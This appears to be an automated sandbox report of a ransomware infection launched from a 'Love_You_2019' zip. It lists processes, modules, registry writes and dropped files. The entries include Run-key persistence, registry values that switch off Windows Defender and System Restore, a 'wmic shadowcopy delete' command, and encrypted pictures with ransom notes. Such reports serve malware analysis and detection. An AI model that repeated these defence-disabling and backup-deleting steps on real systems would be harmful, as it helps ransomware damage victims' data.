c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\windows\system32\apphelp.dll

PID
2992
CMD
C:\Users\admin\657607470096780\winsvcs.exe
Path
C:\Users\admin\657607470096780\winsvcs.exe
Indicators
Parent process
3580527067.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\657607470096780\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\2495831141.exe
c:\users\admin\appdata\local\temp\4177133078.exe

PID
2496
CMD
C:\Users\admin\4950606094303050\wincfg32svc.exe
Path
C:\Users\admin\4950606094303050\wincfg32svc.exe
Indicators
Parent process
3327529366.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll

PID
2452
CMD
C:\Users\admin\AppData\Local\Temp\3478239163.exe
Path
C:\Users\admin\AppData\Local\Temp\3478239163.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3478239163.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2188
CMD
C:\Users\admin\AppData\Local\Temp\2495831141.exe
Path
C:\Users\admin\AppData\Local\Temp\2495831141.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2495831141.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msvcr100.dll

PID
3256
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
3478239163.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
2580
CMD
C:\Users\admin\AppData\Local\Temp\4177133078.exe
Path
C:\Users\admin\AppData\Local\Temp\4177133078.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\4177133078.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll

PID
3116
CMD
C:\Users\admin\AppData\Local\Temp\1469420263.exe
Path
C:\Users\admin\AppData\Local\Temp\1469420263.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\1469420263.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
3076
CMD
C:\Users\admin\AppData\Local\Temp\2184730977.exe
Path
C:\Users\admin\AppData\Local\Temp\2184730977.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2184730977.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll

Registry activity

Total events
1280
Read events
1114
Write events
164
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
4092
3327529366.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
4092
3327529366.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
3128
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3128
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3452
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3452
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3452
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3576
979574639568794.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\495030305060\winsvcs.exe
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableFileTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableConsoleTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
ConsoleTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
MaxFileSize
1048576
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileDirectory
%windir%\tracing
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableFileTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableConsoleTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
ConsoleTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
MaxFileSize
1048576
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileDirectory
%windir%\tracing
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2984
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Love_You_2019_27201936-txt.zip
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2984
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
@C:\Windows\System32\wshext.dll,-4804
JScript Script File
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3636
3580527067.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
3636
3580527067.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableScanOnRealtimeEnable
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableOnAccessProtection
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableBehaviorMonitoring
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusOverride
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesOverride
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallOverride
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AutoUpdateDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
DisableSR
1
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
ext
2E0065007600710075006C006700690068006C000000
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
public
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
private
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
EnableFileTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
EnableConsoleTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
FileTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
ConsoleTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
MaxFileSize
1048576
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
FileDirectory
%windir%\tracing
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
EnableFileTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
EnableConsoleTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
FileTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
ConsoleTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
MaxFileSize
1048576
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
FileDirectory
%windir%\tracing
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
2452
3478239163.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
2452
3478239163.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD
Blob
2452
3478239163.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD

Files activity

Executable files
14
Suspicious files
273
Text files
212
Unknown types
14

Dropped files

PID Process Filename Type
3452 powershell.exe C:\Users\admin\AppData\Local\Temp\979574639568794.exe executable
2992 winsvcs.exe C:\Users\admin\AppData\Local\Temp\2495831141.exe executable
3636 3580527067.exe C:\Users\admin\657607470096780\winsvcs.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3327529366.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\2[1].exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3478239163.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[1].exe executable
2992 winsvcs.exe C:\Users\admin\AppData\Local\Temp\4177133078.exe executable
3576 979574639568794.exe C:\Users\admin\495030305060\winsvcs.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\1469420263.exe executable
4092 3327529366.exe C:\Users\admin\4950606094303050\wincfg32svc.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[2].exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\2184730977.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3580527067.exe executable
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.evqulgihl gpg
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\EVQULGIHL-DECRYPT.txt text
